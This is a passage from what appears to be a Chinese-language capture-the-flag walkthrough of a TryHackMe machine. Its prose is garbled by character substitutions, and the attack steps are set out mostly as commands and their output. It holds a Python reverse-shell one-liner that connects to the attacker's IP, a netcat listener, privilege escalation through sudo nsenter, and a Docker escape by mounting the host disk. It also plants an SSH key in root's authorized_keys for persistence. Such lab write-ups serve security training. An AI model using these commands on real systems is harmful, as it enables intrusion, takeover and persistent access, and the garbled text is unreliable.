python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.13.21.169",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'收到反弹 shell
└─# nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.243.173] 59426
$ ls
ls
bootstrap.min.css bootstrap.min.js index.php jquery.min.js script.js
查看 /etc/passwd 咱们晓得 admin 是零碎里的期中一个用户,因为咱们曾经晓得 admin 的明码,这个时候原本能够间接 su admin
然而这个零碎并没有 su 命令,这个时候能够应用 ssh 来转换角色
ssh admin@localhost sh
www-data@6b364d3940e6:/var/www/html/public$ ssh admin@localhost sh
ssh admin@localhost sh
admin@localhost's password:
id
uid=1000(admin) gid=1000(admin) groups=1000(admin),27(sudo)
whoami
admin这个时候不要切换成 tty,用 sudo - l 查看 admin 的超级权限,发现能够用 /usr/bin/nsenter
sudo -l
Matching Defaults entries for admin on 6b364d3940e6:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User admin may run the following commands on 6b364d3940e6:
(ALL) ALL
(ALL : ALL) ALL
(ALL) NOPASSWD: /usr/bin/nsenter
间接提权到 root
sudo /usr/bin/nsenter /bin/sh
id
id
uid=0(root) gid=0(root) groups=0(root)
去 /root/container1_flag.txt 拿 flag
提权
用 fdisk -l 命令打印发现 /dev/xvda1 这个分区应该是主机的分区
咱们把它挂载到以后 docker 镜像的 /mnt/compromise 上面:
mkdir -p /mnt/compromise
mount /dev/xvda1 /mnt/compromise在/mnt/compromise/root 拿到 root flag
把攻击机的公钥追加到靶机的 authorized_keys
echo "ssh-rsa *************" >> /mnt/compromise/root/.ssh/authorized_keysroot 身份登录靶机
┌──(root💀kali)-[~/tryhackme/hackerhill]
└─# ssh root@10.10.243.173 -p 22 255 ⨯
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-1037-aws x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri Oct 29 08:25:38 UTC 2021
System load: 0.04
Usage of /: 88.8% of 7.69GB
Memory usage: 72%
Swap usage: 37%
Processes: 205
Users logged in: 0
IPv4 address for br-9c1efeb291f3: 172.18.0.1
IPv4 address for docker0: 172.17.0.1
IPv4 address for eth0: 10.10.243.173
=> / is using 88.8% of 7.69GB
0 updates can be installed immediately.
0 of these updates are security updates.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
root@ip-10-10-243-173:~# cat /var/www/container2_flag.txt
cat: /var/www/container2_flag.txt: No such file or directory
root@ip-10-10-243-173:~# whoami
root全局查找 flag2
root@ip-10-10-243-173:/# find / -name container2_flag.txt
find:‘/proc/27811’: No such file or directory
/var/lib/docker/overlay2/fb80a052499ad52a2df535ce669f4cca3b02009c751ab47752374a566ec61667/diff/var/www/container2_flag.txt
/var/lib/docker/overlay2/7149ee32cde09f7439cc3588b5f757bd6b16aaaccb59f8cf3291e8d6dc6c05db/merged/var/www/container2_flag.txt全局查找 flag3
root@ip-10-10-243-173:/# find / -name container3_flag.txt
find:‘/proc/28025/task/28025/net’: Invalid argument
find:‘/proc/28025/net’: Invalid argument
/var/lib/docker/overlay2/d38650b56ff4bbca92fe794176a3394bd05fc9d55d87341b1c0d2a54b5ae1c03/merged/home/container3_flag.txt
/var/lib/docker/overlay2/5bfb136d474f285a5a6133918e11acd8212b7559b33494e11e8c72fbe7e2f6c6/diff/home/container3_flag.txt
正文完
